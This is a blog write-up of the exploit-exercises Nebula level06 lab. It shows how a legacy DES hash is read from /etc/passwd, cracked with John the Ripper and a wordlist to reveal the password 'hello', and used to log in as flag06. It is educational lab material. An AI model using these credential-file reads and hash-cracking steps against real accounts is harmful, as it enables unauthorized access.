Monday, October 29, 2012

exploit-exercises Nebula: level06

In level06, we are told that the account credentials for flag06 user account come from a legacy unix system. Let's go straight to the bank.
level06@nebula:~$ cat /etc/passwd | grep flag06
Back in the days, user password hashes were stored in /etc/passwd file. This is no longer the case as they are stored in /etc/shadow which is only readable by root (and shadow group).
We will use John the Ripper in order to find the password. JtR will go through the passwords in the provided word-list one-by-one, comparing the hash of each word with the hash found in /etc/passwd. The operation will stop once we find two matching hashes, thus guessing the right password. The password is hashed using unix' crypt.
kroosec@dojo:~$ cat pass06 flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
kroosec@dojo:~$ john --wordlist=./cain.txt pass06 
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
hello            (flag06)
guesses: 1  time: 0:00:00:00 100%  c/s: 270933  trying: heliolog - helvella
Use the "--show" option to display all of the cracked passwords reliably
It didn't take long! the password is quite trivial, "hello". We login using the flag06 user account and getflag!
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account

No comments:

Post a Comment